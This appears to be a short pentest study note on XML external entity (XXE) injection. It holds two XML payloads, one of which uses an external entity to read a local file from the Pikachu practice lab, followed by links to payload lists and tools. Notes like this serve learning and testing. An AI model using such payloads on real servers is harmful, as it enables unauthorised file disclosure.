### xxe ```xml <?xml version = "1.0"?> <!DOCTYPE note [ <!ENTITY hacker "test"> ]> <name>&hacker;</name> ``` ```xml <?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///C://phpStudy/WWW/pikachu/vul/rce/shell.php"> ]> <x>&f;</x> ``` ### tools [XXEpayload/xxe at master · hackping/XXEpayload · GitHub](https://github.com/hackping/XXEpayload/tree/master/xxe) ### Reference https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md https://github.com/payloadbox/xxe-injection-payload-list https://gist.githubusercontent.com/Ge0rg3/f3ef5272256f482b48fa69c5ccbac8ee/raw/04ef74149f87bf7d22f6de9edbfbbc0e9b549597/XXEnumerate_2.py ——》 readquick https://pentestbook.six2dez.com/enumeration/web/xxe